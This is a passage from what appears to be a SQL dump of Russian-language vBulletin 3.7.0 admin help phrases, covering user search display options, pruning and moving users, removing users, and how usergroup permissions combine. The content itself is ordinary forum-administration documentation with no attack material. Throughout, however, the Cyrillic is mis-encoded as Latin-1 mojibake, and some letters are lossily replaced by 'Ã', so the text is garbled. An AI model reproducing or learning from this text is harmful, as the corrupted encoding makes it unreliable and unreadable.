ïðåäóïðåæäåíèé áîëüøå èëè ðàâíî', 'vbulletin', 'zCarot', 1207659868, '3.7.0 Release Candidate 3'), (24396, -1, 'user_modify_warningsupper_text', 'cphelptext', 'Ãîèñê ïîëüçîâàòåëåé, êîòîðûå èìåþò ïðåäóïðåæäåíèé ìåíüøå, ÷åì óêàçàíî çäåñü.', 'vbulletin', 'zCarot', 1207659890, '3.7.0 Release Candidate 3'), (24397, -1, 'user_modify_warningsupper_title', 'cphelptext', 'Êîëè÷åñòâî ïðåäóïðåæäåíèé ìåíüøå ÷åì', 'vbulletin', 'zCarot', 1207659890, '3.7.0 Release Candidate 3'), (24398, -1, 'user_modify_infractionslower_text', 'cphelptext', 'Ãîèñê ïîëüçîâàòåëåé, êîòîðûå èìåþò íàðóøåíèé áîëüøå èëè ñòîëüêî æå, ñêîëüêî óêàçàíî çäåñü.', 'vbulletin', 'zCarot', 1207659912, '3.7.0 Release Candidate 3'), (24399, -1, 'user_modify_infractionslower_title', 'cphelptext', 'Êîëè÷åñòâî íàðóøåíèé áîëüøå èëè ðàâíî', 'vbulletin', 'zCarot', 1207659912, '3.7.0 Release Candidate 3'), (24400, -1, 'user_modify_infractionsupper_text', 'cphelptext', 'Ãîèñê ïîëüçîâàòåëåé, êîòîðûå èìåþò íàðóøåíèé ìåíüøå, ÷åì óêàçàíî çäåñü.', 'vbulletin', 'zCarot', 1207659934, '3.7.0 Release Candidate 3'), (24401, -1, 'user_modify_infractionsupper_title', 'cphelptext', 'Êîëè÷åñòâî íàðóøåíèé ìåíüøå ÷åì', 'vbulletin', 'zCarot', 1207659934, '3.7.0 Release Candidate 3'), (24402, -1, 'user_modify_pointslower_text', 'cphelptext', 'Ãîèñê ïîëüçîâàòåëåé, êîòîðûå èìåþò áàëëîâ íàðóøåíèé áîëüøå èëè ñòîëüêî æå, ñêîëüêî óêàçàíî çäåñü.', 'vbulletin', 'zCarot', 1207908457, '3.7.0 Release Candidate 4'), (24403, -1, 'user_modify_pointslower_title', 'cphelptext', 'Êîëè÷åñòâî áàëëîâ íàðóøåíèé áîëüøå èëè ðàâíî', 'vbulletin', 'zCarot', 1207659992, '3.7.0 Release Candidate 3'), (24404, -1, 'user_modify_pointsupper_text', 'cphelptext', 'Ãîèñê ïîëüçîâàòåëåé, êîòîðûå èìåþò áàëëîâ íàðóøåíèé ìåíüøå, ÷åì óêàçàíî çäåñü.', 'vbulletin', 'zCarot', 1207660011, '3.7.0 Release Candidate 3'), (24405, -1, 'user_modify_pointsupper_title', 'cphelptext', 'Êîëè÷åñòâî áàëëîâ íàðóøåíèé ìåíüøå ÷åì', 'vbulletin', 'zCarot', 1207660011, '3.7.0 Release Candidate 3'), (24406, -1, 'user_modify_display[username]_text', 'cphelptext', 'Ãðè óñòàíîâêå ýòîé îïöèè â \"Äà\", â ðåçóëüòàòàõ ïîèñêà áóäåò îòîáðàæàòüñÿ èìÿ êàæäîãî ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24407, -1, 'user_modify_display[username]_title', 'cphelptext', 'Ãîêàçûâàòü èìÿ ïîëüçîâàòåëÿ', 'vbulletin', '', 0, ''), (24408, -1, 'user_modify_useridlower_text', 'cphelptext', 'Ãîèñê ïîëüçîâàòåëåé, êîòîðûå èìåþò èäåíòèôèêàòîð (ID) áîëüøå èëè ðàâíûé, óêàçàííîìó çäåñü.', 'vbulletin', 'zCarot', 1207660072, '3.7.0 Release Candidate 3'), (24409, -1, 'user_modify_useridlower_title', 'cphelptext', 'Ãîìåð (ID) ïîëüçîâàòåëÿ áîëüøå èëè ðàâåí', 'vbulletin', 'zCarot', 1207660072, '3.7.0 Release Candidate 3'), (24410, -1, 'user_modify_useridupper_text', 'cphelptext', 'Ãîèñê ïîëüçîâàòåëåé, êîòîðûå èìåþò èäåíòèôèêàòîð (ID) ìåíüøå, ÷åì óêàçàíî çäåñü.', 'vbulletin', 'zCarot', 1207660131, '3.7.0 Release Candidate 3'), (24411, -1, 'user_modify_useridupper_title', 'cphelptext', 'Ãîìåð (ID) ïîëüçîâàòåëÿ ìåíüøå', 'vbulletin', 'zCarot', 1207660131, '3.7.0 Release Candidate 3'), (24412, -1, 'user_modify_display[options]_text', 'cphelptext', 'Ãðè óñòàíîâêå ýòîé îïöèè â \"Äà\", â ðåçóëüòàòàõ ïîèñêà áóäåò îòîáðàæàòüñÿ ìåíþ îïöèé äëÿ êàæäîãî ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24413, -1, 'user_modify_display[options]_title', 'cphelptext', 'Îïöèè ïðîñìîòðà', 'vbulletin', '', 0, ''), (24414, -1, 'user_modify_display[usergroup]_text', 'cphelptext', 'Ãðè óñòàíîâêå ýòîé îïöèè â \"Äà\", â ðåçóëüòàòàõ ïîèñêà áóäåò îòîáðàæàòüñÿ ãðóïïà êàæäîãî ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24415, -1, 'user_modify_display[usergroup]_title', 'cphelptext', 'Ãîêàçûâàòü ãðóïïû ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24416, -1, 'user_modify_display[email]_text', 'cphelptext', 'Ãðè óñòàíîâêå ýòîé îïöèè â \"Äà\", â ðåçóëüòàòàõ ïîèñêà áóäåò îòîáðàæàòüñÿ àäðåñ ýëåêòðîííîé ïî÷òû ïîëüçîâàòåëåé.', 'vbulletin', '', 0, ''), (24417, -1, 'user_modify_display[email]_title', 'cphelptext', 'Ãîêàçûâàòü àäðåñ ýëåêòðîííîé ïî÷òû', 'vbulletin', '', 0, ''), (24418, -1, 'user_modify_display[parentemail]_text', 'cphelptext', 'Ãðè óñòàíîâêå ýòîé îïöèè â \"Äà\", â ðåçóëüòàòàõ ïîèñêà áóäåò îòîáðàæàòüñÿ àäðåñ ýëåêòðîííîé ïî÷òû ðîäèòåëåé êàæäîãî ïîëüçîâàòåëÿ (åñëè îí óêàçàí).', 'vbulletin', '', 0, ''), (24419, -1, 'user_modify_display[parentemail]_title', 'cphelptext', 'Ãîêàçûâàòü àäðåñ ýëåêòðîííîé ïî÷òû ðîäèòåëåé', 'vbulletin', '', 0, ''), (24420, -1, 'user_modify_display[coppauser]_text', 'cphelptext', 'Ãðè óñòàíîâêå ýòîé îïöèè â \"Äà\" â ðåçóëüòàòàõ ïîèñêà áóäåò ïîìå÷àòüñÿ, ÿâëÿåòñÿ ëè ÷åëîâåê COPPA ïîëüçîâàòåëåì èëè íåò.', 'vbulletin', '', 0, ''), (24421, -1, 'user_modify_display[coppauser]_title', 'cphelptext', 'Ãîêàçûâàòü ïîëüçîâàòåëÿ COPPA', 'vbulletin', '', 0, ''), (24422, -1, 'user_modify_display[homepage]_text', 'cphelptext', 'Ãðè óñòàíîâêå ýòîé îïöèè â \"Äà\", â ðåçóëüòàòàõ ïîèñêà áóäóò îòîáðàæàòüñÿ äîìàøíèå ñòðàíèöû ïîëüçîâàòåëåé (åñëè óêàçàíû).', 'vbulletin', '', 0, ''), (24423, -1, 'user_modify_display[homepage]_title', 'cphelptext', 'Ãîêàçûâàòü äîìàøíþþ ñòðàíèöó', 'vbulletin', '', 0, ''), (24424, -1, 'user_modify_display[icq]_text', 'cphelptext', 'Ãðè óñòàíîâêå ýòîé îïöèè â \"Äà\", â ðåçóëüòàòàõ ïîèñêà áóäåò îòîáðàæàòüñÿ íîìåð ICQ êàæäîãî ïîëüçîâàòåëÿ (åñëè óêàçàí).', 'vbulletin', '', 0, ''), (24425, -1, 'user_modify_display[icq]_title', 'cphelptext', 'Ãîêàçûâàòü íîìåð ICQ', 'vbulletin', '', 0, ''), (24426, -1, 'user_modify_display[aim]_text', 'cphelptext', 'Ãðè óñòàíîâêå ýòîé îïöèè â \"Äà\", â ðåçóëüòàòàõ ïîèñêà áóäóò îòîáðàæàòüñÿ èìåíà AIM êàæäîãî ïîëüçîâàòåëÿ (åñëè óêàçàíî).', 'vbulletin', '', 0, ''), (24427, -1, 'user_modify_display[aim]_title', 'cphelptext', 'Ãîêàçûâàòü èìÿ AIM ', 'vbulletin', '', 0, ''), (24428, -1, 'user_modify_display[yahoo]_text', 'cphelptext', 'Ãðè óñòàíîâêå ýòîé îïöèè â \"Äà\", â ðåçóëüòàòàõ ïîèñêà áóäåò îòîáðàæàòüñÿ íîìåð Yahoo! êàæäîãî ïîëüçîâàòåëÿ (åñëè óêàçàí).', 'vbulletin', '', 0, ''), (24429, -1, 'user_modify_display[yahoo]_title', 'cphelptext', 'Ãîêàçûâàòü íîìåð Yahoo!', 'vbulletin', '', 0, ''), (24430, -1, 'user_modify_display[msn]_text', 'cphelptext', 'Ãðè óñòàíîâêå ýòîé îïöèè â \"Äà\", â ðåçóëüòàòàõ ïîèñêà áóäåò îòîáðàæàòüñÿ èìÿ MSN êàæäîãî ïîëüçîâàòåëÿ (åñëè óêàçàíî).', 'vbulletin', '', 0, ''), (24431, -1, 'user_modify_display[msn]_title', 'cphelptext', 'Ãîêàçûâàòü èìÿ MSN', 'vbulletin', '', 0, ''), (24432, -1, 'user_modify_display[signature]_text', 'cphelptext', 'Ãðè óñòàíîâêå ýòîé îïöèè â \"Äà\", â ðåçóëüòàòàõ ïîèñêà áóäåò îòîáðàæàòüñÿ ïîäïèñü êàæäîãî ïîëüçîâàòåëÿ (åñëè îíà åñòü).', 'vbulletin', '', 0, ''), (24433, -1, 'user_modify_display[signature]_title', 'cphelptext', 'Ãîêàçûâàòü ïîäïèñü', 'vbulletin', '', 0, ''), (24434, -1, 'user_modify_display[usertitle]_text', 'cphelptext', 'Ãðè óñòàíîâêå ýòîé îïöèè â \"Äà\", â ðåçóëüòàòàõ ïîèñêà áóäåò îòîáðàæàòüñÿ ñòàòóñ êàæäîãî ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24435, -1, 'user_modify_display[usertitle]_title', 'cphelptext', 'Ãîêàçûâàòü ñòàòóñ ïîëüçîâàòåëÿ', 'vbulletin', '', 0, ''), (24436, -1, 'user_modify_display[joindate]_text', 'cphelptext', 'Ãðè óñòàíîâêå ýòîé îïöèè â \"Äà\", â ðåçóëüòàòàõ ïîèñêà áóäåò îòîáðàæàòüñÿ äàòà ðåãèñòðàöèè êàæäîãî ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24437, -1, 'user_modify_display[joindate]_title', 'cphelptext', 'Ãîêàçûâàòü äàòó ðåãèñòðàöèè', 'vbulletin', '', 0, ''), (24438, -1, 'user_modify_display[lastactivity]_text', 'cphelptext', 'Ãðè óñòàíîâêå ýòîé îïöèè â \"Äà\", â ðåçóëüòàòàõ ïîèñêà áóäåò îòîáðàæàòüñÿ äàòà ïîñëåäíåé àêòèâíîñòè êàæäîãî ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24439, -1, 'user_modify_display[lastactivity]_title', 'cphelptext', 'Ãîêàçûâàòü ïîñëåäíþþ àêòèâíîñòü', 'vbulletin', '', 0, ''), (24440, -1, 'user_modify_display[lastpost]_text', 'cphelptext', 'Ãðè óñòàíîâêå ýòîé îïöèè â \"Äà\", â ðåçóëüòàòàõ ïîèñêà áóäåò îòîáðàæàòüñÿ äàòà ïîñëåäíåãî ñîîáùåíèÿ êàæäîãî ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24441, -1, 'user_modify_display[lastpost]_title', 'cphelptext', 'Ãîêàçûâàòü ïîñëåäíåå ñîîáùåíèå', 'vbulletin', '', 0, ''), (24442, -1, 'user_modify_display[posts]_text', 'cphelptext', 'Ãðè óñòàíîâêå ýòîé îïöèè â \"Äà\", â ðåçóëüòàòàõ ïîèñêà áóäåò îòîáðàæàòüñÿ ñ÷¸ò÷èê ñîîáùåíèé êàæäîãî ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24443, -1, 'user_modify_display[posts]_title', 'cphelptext', 'Ãîêàçûâàòü ñ÷¸ò÷èê ñîîáùåíèé', 'vbulletin', '', 0, ''), (24444, -1, 'user_modify_display[reputation]_text', 'cphelptext', 'Ãðè óñòàíîâêå ýòîé îïöèè â \"Äà\", â ðåçóëüòàòàõ ïîèñêà áóäåò îòîáðàæàòüñÿ ðåïóòàöèÿ êàæäîãî ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24445, -1, 'user_modify_display[reputation]_title', 'cphelptext', 'Ãîêàçûâàòü ðåïóòàöèþ', 'vbulletin', '', 0, ''), (24446, -1, 'user_modify_display[ipaddress]_text', 'cphelptext', 'Ãðè óñòàíîâêå ýòîé îïöèè â \"Äà\", â ðåçóëüòàòàõ ïîèñêà áóäåò îòîáðàæàòüñÿ IP àäðåñ êàæäîãî ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24447, -1, 'user_modify_display[ipaddress]_title', 'cphelptext', 'Ãîêàçûâàòü IP àäðåñ', 'vbulletin', '', 0, ''), (24448, -1, 'user_modify_display[birthday]_text', 'cphelptext', 'Ãðè óñòàíîâêå ýòîé îïöèè â \"Äà\", â ðåçóëüòàòàõ ïîèñêà áóäåò îòîáðàæàòüñÿ äåíü ðîæäåíèÿ êàæäîãî ïîëüçîâàòåëÿ (åñëè óêàçàí â ïðîôèëå).', 'vbulletin', '', 0, ''), (24449, -1, 'user_modify_display[birthday]_title', 'cphelptext', 'Ãîêàçûâàòü äåíü ðîæäåíèÿ', 'vbulletin', '', 0, ''), (24450, -1, 'user_modify_orderby_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëÿåò óêàçàòü ïîðÿäîê ñîðòèðîâêè ðåçóëüòàòîâ ïîèñêà.', 'vbulletin', '', 0, ''), (24451, -1, 'user_modify_orderby_title', 'cphelptext', 'Ñîðòèðîâêà ïî', 'vbulletin', '', 0, ''), (24452, -1, 'user_modify_limitstart_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëÿåò âàì íà÷àòü ñïèñîê ðåçóëüòàòîâ íå ñ ïåðâîé, à ñ ëþáîé ïîñëåäóþùåé íàéäåííîé çàïèñè.

\r\nÃàïðèìåð, åñëè â ðåçóëüòàòå ïîèñêà íàéäåíî 50 çàïèñåé, íî âû óêàçàëè íà÷àòü ñ 25-é, òî ñòðàíèöà ñ ðåçóëüòàòàìè ïîêàæåò òîëüêî çàïèñè ñ 25 ïî 50.', 'vbulletin', '', 0, ''), (24453, -1, 'user_modify_limitstart_title', 'cphelptext', 'Ãà÷àòü ñ ðåçóëüòàòà', 'vbulletin', '', 0, ''), (24454, -1, 'user_modify_limitnumber_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëÿåò îãðàíè÷èòü êîëè÷åñòâî ðåçóëüòàòîâ.

\r\nÃàïðèìåð, åñëè â ðåçóëüòàòå ïîèñêà íàéäåíî 50 çàïèñåé, íî âû îãðàíè÷èëè êîëè÷åñòâî ðåçóëüòàòîâ 25-þ, òî ñòðàíèöà ñ ðåçóëüòàòàìè ïîêàæåò òîëüêî 25, íà÷èíàÿ ñ íîìåðà, óêàçàííîãî â ïðåäûäóùåé íàñòðîéêå.', 'vbulletin', '', 0, ''), (24455, -1, 'user_modify_limitnumber_title', 'cphelptext', 'Ìàêñèìóì ðåçóëüòàòîâ', 'vbulletin', '', 0, ''), (24456, -1, 'user_prune_text', 'cphelptext', 'Ãòà ñèñòåìà ïîçâîëÿåò ìàññîâî ïåðåìåùàòü ïîëüçîâàòåëåé â ðàçëè÷íûå ãðóïïû èëè óäàëÿòü íåàêòèâíûõ ïîëüçîâàòåëåé. Èñïîëüçóéòå ôîðìó íèæå, äëÿ âûáîðà óñëîâèé ïîèñêà ïîëüçîâàòåëåé. Ãî îêîí÷àíèè ïîèñêà âû ñìîæåòå èíäèâèäóàëüíî ïåðåìåùàòü èëè óäàëÿòü îòîáðàííûõ ïîëüçîâàòåëåé.', 'vbulletin', '', 0, ''), (24457, -1, 'user_prune_title', 'cphelptext', 'Ñèñòåìà ïåðåìåùåíèÿ/óäàëåíèÿ ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24458, -1, 'user_prune_usergroupid_text', 'cphelptext', 'Âûáåðèòå ãðóïïó ïîëüçîâàòåëåé, â êîòîðîé íåîáõîäèìî èñêàòü. Åñëè ïîëüçîâàòåëü íå ïðèíàäëåæèò óêàçàííîé ãðóïïå, îí íå áóäåò îòîáðàæ¸í íà ñòðàíèöå ðåçóëüòàòîâ ïîèñêà.', 'vbulletin', '', 0, ''), (24459, -1, 'user_prune_usergroupid_title', 'cphelptext', 'Ãðóïïà ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24460, -1, 'user_prune_daysprune_text', 'cphelptext', 'Ãîëüçîâàòåëè, êîòîðûå íå âõîäèëè íà ôîðóì êàê ìèíèìóì ýòî êîëè÷åñòâî äíåé è ïðîøåäøèå ïî äðóãèì ïàðàìåòðàì ïîèñêà, áóäóò îòîáðàæåíû íà ñòðàíèöå ðåçóëüòàòîâ. Òàê ìîæíî âû÷èñëèòü íåàêòèâíûõ ïîëüçîâàòåëåé.', 'vbulletin', '', 0, ''), (24461, -1, 'user_prune_daysprune_title', 'cphelptext', 'ÃÃ¥ âõîäèë X äíåé', 'vbulletin', '', 0, ''), (24462, -1, 'user_prune_joindate_text', 'cphelptext', 'Âûáåðèòå ìåñÿö è ââåäèòå äâóçíà÷íûé äåíü è ÷åòûðåõçíà÷íûé ãîä. Ãîëüçîâàòåëè, êîòîðûå çàðåãèñòðèðîâàëèñü äî ýòîé äàòû è ïðîøåäøèå ïî äðóãèì ïàðàìåòðàì áóäóò îòîáðàæåíû íà ñòðàíèöå ðåçóëüòàòîâ. Òàê ìîæíî âû÷èñëèòü ñòàðûõ ïîëüçîâàòåëåé.', 'vbulletin', '', 0, ''), (24463, -1, 'user_prune_joindate_title', 'cphelptext', 'Ãåãèñòðàöèÿ äî', 'vbulletin', '', 0, ''), (24464, -1, 'user_prune_minposts_text', 'cphelptext', 'Ãîëüçîâàòåëè, ñ êîëè÷åñòâîì ñîîáùåíèé ìåíüøå, ÷åì ýòî ÷èñëî, è ïðîøåäøèå ïî äðóãèì ïàðàìåòðàì áóäóò îòîáðàæåíû íà ñòðàíèöå ðåçóëüòàòîâ. Òàê ìîæíî âû÷èñëèòü ïîëüçîâàòåëåé, êîòîðûå îñòàâëÿþò ìàëî ñîîáùåíèé.', 'vbulletin', '', 0, ''), (24465, -1, 'user_prune_minposts_title', 'cphelptext', 'Ñîîáùåíèé ìåíüøå ÷åì', 'vbulletin', '', 0, ''), (24466, -1, 'user_prune_order_text', 'cphelptext', 'Óêàæèòå, ïî êàêîìó ïàðàìåòðó áóäóò îòñîðòèðîâàíû ðåçóëüòàòû ïîèñêà.', 'vbulletin', '', 0, ''), (24467, -1, 'user_prune_order_title', 'cphelptext', 'Ñîðòèðîâêà ïî', 'vbulletin', '', 0, ''), (24468, -1, 'user_pruneusers_text', 'cphelptext', 'Ãèæå âû âèäèòå ñïèñîê ïîëüçîâàòåëåé, ñîîòâåòñòâóþùèõ çàäàííûì ïàðàìåòðàì ïîèñêà. Òåïåðü âû ìîæåòå óäàëÿòü èëè ïåðåìåùàòü ïîëüçîâàòåëåé. Îòìåòüòå ôëàæêàìè òåõ ïîëüçîâàòåëåé, ñ êîòîðûì âû æåëàåòå ïðîèçâåñòè äåéñòâèå, çàòåì íèæå âûáåðèòå äåéñòâèå (\"Óäàëèòü\" èëè \"Ãåðåìåñòèòü\"). Åñëè âû âûáðàëè \"Ãåðåìåñòèòü\", óáåäèòåñü, ÷òî âû âûáðàëè ãðóïïó ïîëüçîâàòåëåé, â êîòîðóþ òðåáóåòñÿ ïåðåìåñòèòü óêàçàííûõ ïîëüçîâàòåëåé. Ãàæìèòå íèæå êíîïêó \"Âïåð¸ä\", ÷òîáû ïðîèçâåñòè âûáðàííîå äåéñòâèå.', 'vbulletin', '', 0, ''), (24469, -1, 'user_pruneusers_title', 'cphelptext', 'Óäàëåíèå/ïåðåìåùåíèå ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24470, -1, 'user_remove_text', 'cphelptext', 'Ãàæìèòå íèæå êíîïêó \"Äà\" äëÿ óäàëåíèÿ ïîëüçîâàòåëÿ. Åñëè âû æåëàåòå óäàëèòü ñîîáùåíèÿ, ëè÷íûå ñîîáùåíèÿ è ò.ä. ýòîãî ïîëüçîâàòåëÿ, íåîáõîäèìî ñäåëàòü ýòî ÄÎ óäàëåíèÿ ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24471, -1, 'user_remove_title', 'cphelptext', 'Óäàëèòü ïîëüçîâàòåëÿ', 'vbulletin', '', 0, ''), (24472, -1, 'usergroup_text', 'cphelptext', 'Ñïðàâî÷íûå ñòàòüè:
\r\nÃðóïïû ïîëüçîâàòåëåé
\r\nÃðàâà â ðàçäåëàõ
\r\nÃðàâà àäìèíèñòðàòîðà
\r\n
Ãðóïïû ïîëüçîâàòåëåé:
\r\nÑèñòåìà ãðóïï ïîëüçîâàòåëåé ôîðóìà, êàê ëþáàÿ äðóãàÿ ñèñòåìà ãðóïï ïîëüçîâàòåëåé, èñïîëüçóåòñÿ äëÿ óïðàâëåíèÿ ïðàâàìè äîñòóïà ôîðóìà. Âû ìîæåòå óïðàâëÿòü ïðàâàìè äîñòóïà ïóò¸ì îðãàíèçàöèè ïîëüçîâàòåëåé â ãðóïïû è óñòàíîâêè ðàçðåøåíèé äëÿ ýòèõ ãðóïï. Êðîìå òîãî, ïîëüçîâàòåëè ìîãóò ïðèíàäëåæàòü íåñêîëüêèì ãðóïïàì, îòïðàâëÿòü çàÿâêè íà âñòóïëåíèå â äðóãèå ãðóïïû.  äîïîëíåíèå ê ýòîìó, ôîðóì ïîçâîëÿåò óñòàíàâëèâàòü ïîâûøåíèÿ äëÿ ãðóïïû, ÷òîáû àâòîìàòè÷åñêè ìåíÿòü ÷ëåíñòâî â ãðóïïàõ ïðè âûïîëíåíèè íåêîòîðûõ óñëîâèé.
\r\n
Ãðàâà äîñòóïà ãðóïïû ïîëüçîâàòåëåé èìåþò äâà óðîâíÿ: ïåðâûé - ýòî ïðàâà äîñòóïà ïîëüçîâàòåëüñêèõ ãðóïï, êîòîðûå óñòàíàâëèâàþòñÿ â óïðàâëåíèè ãðóïïàìè ïîëüçîâàòåëåé. Ãî óìîë÷àíèþ, ïîëüçîâàòåëü áóäåò èìåòü ýòè ðàçðåøåíèÿ âî âñåõ ðàçäåëàõ. Åñëè âû õîòèòå óñòàíîâèòü îñîáûå ïðàâà äëÿ ãðóïïû â êîíêðåòíîì ðàçäåëå, âû ìîæåòå ñäåëàòü ýòî, óñòàíîâèâ îñîáûå ïðàâà äîñòóïà äëÿ êàæäîãî ðàçäåëà íà ñòðàíèöå Ãðàâà â ðàçäåëàõ. Ñòðàíèöà Ãðàâà êàëåíäàðÿ ïðåäîñòàâëÿåò ñõîäíûå âîçìîæíîñòè äëÿ êàëåíäàðåé.
\r\n
Ãîëüçîâàòåëè ìîãóò ïðèíàäëåæàòü íåñêîëüêèì ãðóïïàì. Åñòü äâà òèïà ïîëüçîâàòåëüñêèõ ãðóïï: îñíîâíàÿ è äîïîëíèòåëüíàÿ. Ãîëüçîâàòåëü ìîæåò ïðèíàäëåæàòü òîëüêî ê îäíîé îñíîâíîé ãðóïïå, íî ìîæåò ïðèíàäëåæàòü ê íåñêîëüêèì äîïîëíèòåëüíûì. Îñíîâíàÿ ãðóïïà îïðåäåëÿåò áàçîâûå ïðàâà äîñòóïà ôîðóìà; êàê ìèíèìóì, ïîëüçîâàòåëü âñåãäà áóäåò èìåòü ïðàâà â ðàçäåëàõ, óñòàíîâëåííûå äëÿ îñíîâíîé ãðóïïû, ê êîòîðîé îí ïðèíàäëåæèò. Äîïîëíèòåëüíûå ãðóïïû ìîãóò áûòü èñïîëüçîâàíû äëÿ ïðåäîñòàâëåíèÿ äîïîëíèòåëüíûõ âîçìîæíîñòåé, êîòîðûå íå ïðåäîñòàâëÿþòñÿ âñåì ïîëüçîâàòåëÿì îñíîâíîé ãðóïïû.
\r\n
×òîáû äîïîëíèòåëüíûå ãðóïïû âëèÿëè íà ðàçðåøåíèÿ ïîëüçîâàòåëåé (ïðè âñòóïëåíèè â íèõ), íåîáõîäèìî, ÷òîáû â îñíîâíîé ãðóïïå òàêèõ ïîëüçîâàòåëåé îïöèÿ \"Ãàçðåøèòü ðàñøèðåíèå ïðàâ äîñòóïà\" áûëà âêëþ÷åíà. Ñì. Óïðàâëåíèå ãðóïïàìè ïîëüçîâàòåëåé. Âîîáùå ñèñòåìû ïðàâ äîñòóïà îñíîâíîé è äîïîëíèòåëüíûõ ãðóïï ñîâìåùàþòñÿ ïî ïðèíöèïó \"äàòü ìàêñèìàëüíûå ïðàâà\". Ãàïðèìåð, åñëè äëÿ îñíîâíîé ãðóïïû ïîëüçîâàòåëÿ îïöèÿ \"Ìîæåò ïðîñìàòðèâàòü ðàçäåë\" óñòàíîâëåíà â \"Ãåò\", à äëÿ îäíîé èç äîïîëíèòåëüíûõ ãðóïï, êóäà âõîäèò ýòîò ïîëüçîâàòåëü, òà æå îïöèÿ óñòàíîâëåíà â \"Äà\", ðåçóëüòèðóþùåé îïöèåé ñòàíåò \"Äà\". ×èñëåííûå îãðàíè÷åíèÿ è îïöèè äëÿ ãðóïï äåéñòâóþò òàêèì æå îáðàçîì, òîëüêî âìåñòî çíà÷åíèé \"Äà\" è \"Ãåò\" äëÿ ïîëüçîâàòåëÿ ïðèìåíÿåòñÿ îïöèÿ ñ áîëüøèì çíà÷åíèåì ÷èñëà.\r\nÂîçìîæíîñòè íàñòðîåê äëÿ äîïîëíèòåëüíûõ ãðóïï âêëþ÷àþò ðàçðåøåíèå äîñòóïà ê ñêðûòûì ðàçäåëàì. Ãàïðèìåð, îñíîâíàÿ ãðóïïà ïîëüçîâàòåëÿ ìîæåò èìåòü ê äàííîìó ñêðûòîìó ðàçäåëó íóëåâîé äîñòóï, óñòàíîâëåííûé â ïðàâàõ ôîðóìà. Äëÿ äîïîëíèòåëüíîé ãðóïïû âñå ðàçðåøåíèÿ ìîãóò áûòü óñòàíîâëåíû â \"Ãåò\" â óïðàâëåíèè ãðóïïàìè ïîëüçîâàòåëåé, íî ìîæåò áûòü óñòàíîâëåíî ðàçðåøåíèå äîñòóïà ê äàííîìó ðàçäåëó â ïðàâàõ ôîðóìà. Ãåçóëüòàòîì äîáàâëåíèÿ ïîëüçîâàòåëÿ ê ýòîé äîïîëíèòåëüíîé ãðóïïå áóäåò ðàçðåøåíèå äîñòóïà äëÿ íåãî ê äàííîìó ñêðûòîìó ðàçäåëó. Ãòî ãîðàçäî óäîáíåå, ÷åì óñòàíàâëèâàòü ëèøíèå ðàçðåøåíèÿ äëÿ îñíîâíûõ ãðóïï.
\r\n
Åñëè â îñíîâíîé ãðóïïå îïöèÿ \"Ãàçðåøèòü ðàñøèðåíèå ïðàâ äîñòóïà\" óñòàíîâëåíà â \"Ãåò\" (ñì. Óïðàâëåíèå ãðóïïàìè ïîëüçîâàòåëåé), òî ÷ëåíñòâî â ëþáûõ äîïîëíèòåëüíûõ ãðóïïàõ íå áóäåò ðàñøèðÿòü ïðàâà äîñòóïà, çàäàííûå äëÿ ýòîé ãðóïïû. Åäèíñòâåííàÿ ïðè÷èíà, ïî êîòîðîé ýòà îïöèÿ ìîæåò áûòü âûêëþ÷åíà â îñíîâíîé ãðóïïå - åñëè äàííàÿ ãðóïïà ÿâëÿåòñÿ ãðóïïîé çàáëîêèðîâàííûõ ïîëüçîâàòåëåé; â ýòîì ñëó÷àå ÷ëåíñòâî â äîïîëíèòåëüíûõ ãðóïïàõ íå äîëæíî ðàñøèðÿòü íóëåâîé äîñòóï çàáëîêèðîâàííûõ ïîëüçîâàòåëåé.
\r\n
Äðóãîé ôóíêöèåé ñèñòåìû ïîëüçîâàòåëüñêèõ ãðóïï ÿâëÿåòñÿ ïðåäîñòàâëåíèå âîçìîæíîñòè ïîëüçîâàòåëÿì ïîñûëàòü çàÿâêè íà âñòóïëåíèå â ãðóïïû. Òàêèì îáðàçîì, ñèñòåìà ïîçâîëÿåò ïîëüçîâàòåëÿì çàïðàøèâàòü äîïîëíèòåëüíûå ïðàâà äîñòóïà, ò.ê. ïðàâà äîñòóïà íà ôîðóìå óïðàâëÿþòñÿ ñ ïîìîùüþ ÷ëåíñòâà â ãðóïïàõ. Ãîëüçîâàòåëè ìîãóò ïîñûëàòü çàÿâêè íà âñòóïëåíèå ñî ñòðàíèöû ×ëåíñòâî â ãðóïïàõ ñâîåé ïàíåëè óïðàâëåíèÿ. Ãîëüçîâàòåëè ñìîãóò ïîñëàòü çàÿâêó íà âñòóïëåíèå òîëüêî â òó ãðóïïó, ó êîòîðûõ âêëþ÷åíà îïöèÿ \"Ãóáëè÷íàÿ ãðóïïà\" â óïðàâëåíèè ãðóïïàìè ïîëüçîâàòåëåé. Âû ìîæåòå óïðàâëÿòü ýòèìè çàÿâêàìè ñî ñòðàíèöû Çàÿâêè íà âñòóïëåíèå.\r\nÊðîìå òîãî, â óïðàâëåíèè ãðóïïàìè ïîëüçîâàòåëåé âû ìîæåòå íàçíà÷èòü ëèäåðîâ ãðóïï, êîòîðûå ñìîãóò óïðàâëÿòü çàÿâêàìè íà âñòóïëåíèå â èõ ãðóïïó (ïîäòâåðæäàòü/îòêëîíÿòü) ñî ñòðàíèöû ×ëåíñòâî â ãðóïïàõ ñâîåãî êàáèíåòà.
\r\n
